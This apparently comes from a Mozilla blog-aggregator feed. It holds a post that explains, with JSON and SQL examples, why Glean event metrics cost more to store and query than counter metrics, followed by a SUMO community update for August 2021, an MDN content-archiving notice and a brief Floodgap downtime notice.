In this regard, I often encounter challenges in trying to read or analyze data that is related to another common task I find myself doing: advising engineering teams on how we intend Glean to be used and what metric types would best suit their needs. A recent example of this was a quick Q&A for a group of mobile engineers who all had similar questions. My teammate chutten and I were asked to explain the differences between Counter Metrics and Event Metrics, and try and help them understand the situations where each of them were the most appropriate to use. It was a great session and I felt like the group came away with some deeper understanding of the Glean principles. But, after thinking about it afterwards, I realized that we do a lot of hand-wavy things when explaining why not to do things. Even in our documentation, we aren’t very specific about the overhead of things like Event Metrics. For example, from the Glean documentation section regarding “Choosing a Metric Type” in a warning about events:

“Important: events are the most expensive metric type to record, transmit, store and analyze, so they should be used sparingly, and only when none of the other metric types are sufficient for answering your question.”

This is sufficiently scary to make me think twice about using events! But what exactly do we mean by “they are the most expensive”? What about recording, transmitting, storing, and analyzing makes them “expensive”? Well, that’s what I hope to dive into a little deeper with some real numbers and examples, rather than using scary hand-wavy words like “expensive” and “should be used sparingly”. I’ll mostly be focusing on events here, since they contain the “scariest” warning. So, without further ado, let’s take a look at some real comparisons between metric types, and what challenges someone looking at that data may encounter when trying to answer questions about it or with it.

Our claim is that events are expensive to record, store and transmit; so let’s start by examining that a little closer. The primary API surface for the Event Metric Type in Glean is the record() function. This function also takes an optional collection of “extra” information in a key-value shape, which is supposed to be used to record additional state that is important to the event. The “extras”, along with the category, name, and (relative) timestamp, makes up the data that gets recorded, stored, and eventually transmitted to the ingestion pipeline for storage in the data warehouse.

Since Glean is built with Rust and then provides SDKs in various target languages, one of the first things we have to do is serialize the data from the shiny target-language object that Glean generates into something we can pass into the Rust that is at the heart of Glean. (It is worth noting that the Glean JavaScript SDK does this a little differently, but the same ideas apply to events.) A similar structure is used to store the data and then transmit it to the telemetry endpoint when the Events Ping is assembled. A real-world example of this serialized event, coming from Fenix’s “Entered URL” action, looks like this JSON:

{
  "category": "events",
  "extra": {
    "autocomplete": "false"
  },
  "name": "entered_url",
  "timestamp": 33191
}
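
For orientation, producing that record is a single call to the record() API mentioned above. Here is a hedged Kotlin sketch; the generated accessor name and the shape of the extras argument are assumptions from memory, not the exact Fenix code:

// Hypothetical generated accessor for the "entered URL" event.
// Glean fills in the category, name, and relative timestamp itself.
Events.enteredUrl.record(mapOf(Events.enteredUrlKeys.autocomplete to "false"))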

A similar amount of data is generated every time the metric is recorded, stored, and transmitted. So, if the user entered 10 URLs, we would record this same structure 10 times, each with a different relative timestamp. To take a quick look at how this affects using the data for analysis: if I only needed to know how many users interacted with this feature and how often, I would have to count each event with this category and name for every user. To complicate the analysis a bit further, Glean doesn’t transmit events one at a time; it collects all events during a “session” (or until 500 events have been recorded) and transmits them as an array within an Event Ping. This Event Ping then becomes a single row in the data, with the array of events nested in a column. In order to even count the events, I need to “unnest” them and flatten out the data, cross joining each event in the array back to the parent ping record just to get at the category, name, timestamp, and extras. We end up with some SQL that looks like this (WARNING: this is just an example. Don’t run it as-is: it could be expensive, since I left out the filter on the submission date):

SELECT *
FROM fenix
CROSS JOIN UNNEST (events) AS event

For an average day in Fenix we see 75-80 million Event Pings from clients on our release version, with an average of a little over 8 events per ping. That adds up to over 600 million events per day, just for Fenix! So when we do this little bit of SQL flattening of the data structure, we end up manipulating over half a billion records for a single day, and that adds up really quickly if you start looking at more than one day at a time. This can take a lot of computing horsepower, both in processing the query and in trying to display the results in some visual representation. Now that I have the events flattened out, I can finally filter for the category and name of the event I am looking for and count how many of that specific event are present. Using the Fenix “entered_url” event from above, I end up with something like this to count the number of clients and events:

SELECT
  COUNT(DISTINCT client_info.client_id) AS client_count,
  COUNT(*) AS event_count,
  DATE(submission_timestamp) AS event_date
FROM
  fenix.events
CROSS JOIN
  UNNEST(events.events) AS event -- Yup, event.events, naming=hard
WHERE
  submission_timestamp >= '2021-08-12'
  AND event.category = 'events'
  AND event.name = 'entered_url'
GROUP BY
  event_date
ORDER BY
  event_date

Our query engine is pretty good: this only takes about 8 seconds to process, and it has narrowed down the data it needs to scan to a paltry 150 GB, but this is a very simple analysis of the data involved. I didn’t even dig into the “extra” information, which would require yet another level of flattening through UNNESTing the “extras” array stored in each individual event.
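
For completeness, here is a sketch of what that second level of flattening might look like, assuming the extras land in the table as an array of key/value pairs mirroring the JSON example above (illustrative only, with the same cost caveats as before):

SELECT
  extra.value AS autocomplete,
  COUNT(*) AS event_count
FROM
  fenix.events
CROSS JOIN
  UNNEST(events.events) AS event
CROSS JOIN
  UNNEST(event.extra) AS extra -- one row per key/value pair, per event
WHERE
  submission_timestamp >= '2021-08-12'
  AND event.category = 'events'
  AND event.name = 'entered_url'
  AND extra.key = 'autocomplete'
GROUP BY
  autocomplete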

As you can see, this explodes pretty quickly into some big datasets for just counting things. Don’t get me wrong, this is all very useful if you need to know the sequence of events that led the client to entering a URL, that’s what events are for after all. To be fair, our lovely Data Engineering folks have taken the time and trouble to create views where these events are already unnested, and so I could have avoided doing it manually and instead use the automatically flattened dataset. I wanted to better illustrate the additional complexity that goes on downstream from events and working with the “raw” data seemed the best way to do this.

If we really just need to know how many clients interact with a feature and how often, then a much lighter weight alternative recommended by the Glean team would be a Counter Metric. To return to what the data representation of this looks like, we can look at an internal Glean metric that counts the number of times Fenix enters the foreground per day (since the metrics ping is sent once per day). It looks like this:

"counter": {
"glean.validation.foreground_count": 1
}
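
The recording side is just as small; here is a hedged Kotlin sketch, where the generated accessor name is my guess derived from the metric identifier above:

// Hypothetical accessor for glean.validation.foreground_count.
// Each call increments one stored integer; it never adds rows.
GleanValidation.foregroundCount.add(1)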

No matter how many times we add() to this metric, it will always take up that same amount of space right there; only the value changes. So, instead of one record per occurrence, we end up with a single value that represents the count of the interactions. When I query this to find out how many clients were involved and how many times the app moved to the foreground of the device, I can do something like this in SQL (without all the UNNESTing):

SELECT
  COUNT(DISTINCT client_info.client_id) AS client_count,
  SUM(m.metrics.counter.glean_validation_foreground_count) AS foreground_count,
  DATE(submission_timestamp) AS event_date
FROM
  org_mozilla_firefox.metrics AS m
WHERE
  submission_timestamp >= '2021-08-12'
GROUP BY
  event_date
ORDER BY
  event_date

This runs in just under 7 seconds, and the query only has to scan about 5 GB of data instead of the 150 GB we saw with the event. And, for comparison, there were only about 8 million of those entered_url events per day compared to 80 million foreground occurrences per day. Even counting ten times as many occurrences, the query using the Counter Metric Type scanned 1/30th the amount of data. It is also fairly obvious which query is easier to understand. The foreground count is just a numeric counter value stored in a single row in the database along with all of the other metrics collected and sent on the daily metrics ping, and it ultimately results in selecting a single column value. Rather than having to unnest arrays and then count them, I can simply SUM the values stored in the counter’s column to get my result.

Events do serve a beautiful purpose, like building an onboarding funnel to determine how well we retain users and which onboarding path leads to that retention. We can’t do that with counters because they don’t have the richness needed to show the flow of interactions through the app. Counters also serve a purpose, and can answer questions about the usage of a feature with very little overhead. I just hope that as you read this, you will consider what questions you need to answer, and remember that there is probably a well-suited Glean metric type just for your purpose; and if there isn’t, you can always request a new metric type! The Glean Team wants you to get the most out of your data while being true to our lean data practices, and we are always available to discuss which metric type is right for your situation if you have any questions.

Support.Mozilla.OrgWhat’s up with SUMO – August 2021

Hey SUMO folks,

Summer is here. Despite the current state of the world, I hope you can still enjoy a bit of sunshine and a breeze of fresh air wherever you are. And while vacations are being planned, SUMO is still busy with lots of projects and releases. So let’s get the recap started!

Welcome on board!

  1. Welcome Julie and Rowan! Thank you for diving into the KB world.

Community news

  • One of our goals for Q3 this year is to revamp the onboarding experience for contributors, focused on the /get-involved page. To support this work, we’re currently conducting a survey to understand how effective the current onboarding information we provide is. Please fill out the survey if you haven’t already, and share it with your community and fellow contributors!
  • No Kitsune update for this month. Check out the SUMO Engineering Board instead to see what the team is currently doing.

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in July!
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel too shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB pageviews (*)

Month | Page views | Vs previous month
Jul 2021 | 8,237,410 | -10.81%
* The KB pageviews number is the total of KB pageviews for /en-US/ only

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Michele Rodaro
  3. Pierre Mozinet
  4. Romado33
  5. K_alex

KB Localization

Top 10 locales based on total page views

Locale | Apr 2021 pageviews (*) | Localization progress (per Jul 9) (**)
de | 8.62% | 99%
zh-CN | 6.92% | 100%
pt-BR | 6.32% | 64%
es | 6.22% | 45%
fr | 5.70% | 91%
ja | 4.13% | 55%
ru | 3.61% | 99%
it | 2.08% | 100%
pl | 2.00% | 84%
zh-TW | 1.44% | 6%
* Locale pageviews is the overall number of pageviews from the given locale (KB and other pages)

** Localization progress is the percentage of localized articles out of all KB articles per locale

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. Soucet
  3. Jim Spentzos
  4. Michele Rodaro
  5. Mark Heijl

Forum Support

Forum stats

Month | Total questions | Answer rate within 72 hrs | Solved rate within 72 hrs | Forum helpfulness
Jul 2021 | 3175 | 72.13% | 15.02% | 81.82%

Top 5 forum contributors in the last 90 days: 

  1. FredMcD
  2. Cor-el
  3. Jscher2000
  4. Seburo
  5. Sfhowes

Social Support

Channel | Total conv (Jul 2021) | Conv interacted (Jul 2021)
@firefox | 2967 | 341
@FirefoxSupport | 386 | 270

Top 5 contributors in Q1 2021

  1. Christophe Villeneuve
  2. Andrew Truong
  3. Pravin

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

Firefox mobile

  • FX for Android V91 (August 10)
  • FX for iOS V36 (August 10)
    • Fixes: Tab preview not showing in tab tray

Other products / Experiments

  • Mozilla VPN V2.5 (September 8)
    • Multi-hop: using multiple VPN servers. This VPN server chaining method gives extra security and privacy.
    • Support for local DNS: if needed, you can set a custom DNS server to use while the Mozilla VPN is on.
    • Getting help if you cannot sign in: ‘get support’ improvements.

Upcoming Releases

  • FX Desktop 92, FX Android 92, FX iOS V37 (September 7)
  • Updates to FX Focus (October)

Shout-outs!

  • Thanks to Felipe Koji for his great work on Social Support.
  • Thanks to Seburo for constantly championing support for Firefox mobile.

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to add them in our next edition.

Useful links:

Hacks.Mozilla.OrgSpring cleaning MDN: Part 2

[Illustration by Daryl Alexsy: a blue dinosaur sweeping with a broom]

The bags have been filled up with all the things we’re ready to let go of and it’s time to take them to the charity shop.

Archiving content

Last month we removed a bunch of content from MDN. MDN is 16 years old (and yes, it can drink in some countries). All that time ago, it was a great place for all of Mozilla to document all of their things. As MDN evolved and the web reference became our core content, other areas became less relevant to the overall site. We have ~11k active pages on MDN, so keeping them up to date is a big task, and we feel our focus should be there.

This was a big decision and had been in the works for over a year. It actually started before we moved MDN content to GitHub. You may have noticed a banner every now and again, saying certain pages weren’t maintained. Various topics were removed including all Firefox (inc. Gecko) docs, which you can now find here. Mercurial, Spidermonkey, Thunderbird, Rhino and XUL were also included in the archive.

So where is the content now?

It’s saved – it’s in this repo. We haven’t actually deleted it completely. Some of it is being re-hosted by various teams, and we have the ability to redirect to those new places. It’s kept in both its rendered state and the raw wiki form. Just. In. Case.

The post Spring cleaning MDN: Part 2 appeared first on Mozilla Hacks - the Web developer blog.

Cameron KaiserUnplanned Floodgap downtime

Floodgap is down due to an upstream circuit cut and TenFourFox users may get timeouts when checking versions. All Floodgap services including web, gopher and E-mail are affected. The telco is on it, but I have no ETA for repair. If the downtime will be prolonged, I may host some services temporarily on a VPS.